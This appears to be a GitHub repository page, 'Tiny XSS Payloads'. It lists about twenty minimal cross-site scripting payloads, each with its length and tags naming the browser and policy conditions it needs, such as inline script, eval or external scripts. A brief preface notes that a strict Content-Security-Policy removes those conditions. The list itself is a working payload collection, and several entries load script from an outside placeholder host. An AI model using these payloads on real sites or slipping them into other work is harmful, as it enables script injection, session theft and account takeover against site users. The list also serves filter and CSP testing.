Tiny XSS Payloads

github.com/uttambodara/Tiny-XSS-Payloads

Features available

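Payloads

Each entry is three lines: the payload, its length in characters, and the tags naming what the injection context must allow for it to run (inline script, eval, external scripts, attacker control of `window.name` or the URL, and so on). Read defensively, the tags are the preconditions to remove: every entry below carries `script-unsafe-inline`, `external-scripts` or both, so a Content-Security-Policy that disallows inline script and limits script sources to trusted origins takes away what each one relies on. The lengths appear to count a one-character form of the `NJ` placeholder host, so entries containing it read one character longer here than the number given.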

<base/href=//NJ.₨>
17
requires-relative-script-after-injection, external-scripts
<svg/onload=eval(name)>
23
script-unsafe-inline, unsafe-eval, controls-name, not-innerHTML
<style/onload=eval(name)>
25
style-inline-allowed, unsafe-eval, script-unsafe-inline, controls-name
<svg/onload=eval(`'`+URL)>
26
script-unsafe-inline, unsafe-eval, controls-URL, not-innerHTML
<svg/onload=location=name>
26
script-unsafe-inline, controls-name, not-innerHTML
<style/onerror=eval(name)>
26
chrome-only, unsafe-eval, script-unsafe-inline, controls-name, style-inline-blocked
<script/src=//NJ.₨></script>
27
external-scripts, not-innerHTML
<svg/onload=import(/\NJ.₨/)>
27
script-unsafe-inline, not-innerHTML, firefox-innerHTML, external-scripts
<iframe/onload=src=top.name>
28
script-unsafe-inline, controls-name
<svg><svg/onload=eval(name)>
28
script-unsafe-inline, unsafe-eval, controls-name, not-innerHTML, chrome-innerHTML
<style/onload=eval(`'`+URL)>
28
unsafe-eval, script-unsafe-inline, controls-URL, style-inline-allowed
<iframe/onload=eval(`'`+URL)>
29
unsafe-eval, script-unsafe-inline, controls-URL
<style/onload=import(/\NJ.₨/)>
29
script-unsafe-inline, external-scripts, style-inline-allowed
<audio/src/onerror=eval(name)>
30
script-unsafe-inline, unsafe-eval, controls-name
<iframe/onload=import(/\NJ.₨/)>
30
script-unsafe-inline, external-scripts
<img/src/onerror=eval(`'`+URL)>
31
script-unsafe-inline, unsafe-eval, controls-URL
<iframe/onload=src=top[0].name+/\NJ.₨/>
38
external-iframes, script-unsafe-inline, controls-index-of-iframe
<iframe/srcdoc="<svg><script/href=//NJ.₨ />">
44
external-scripts
<iframe/onload=src=contentWindow.name+/\NJ.₨/>
45
external-iframes, script-unsafe-inline
<iframe/srcdoc="<script/src=//NJ.₨></script>">
45
external-scripts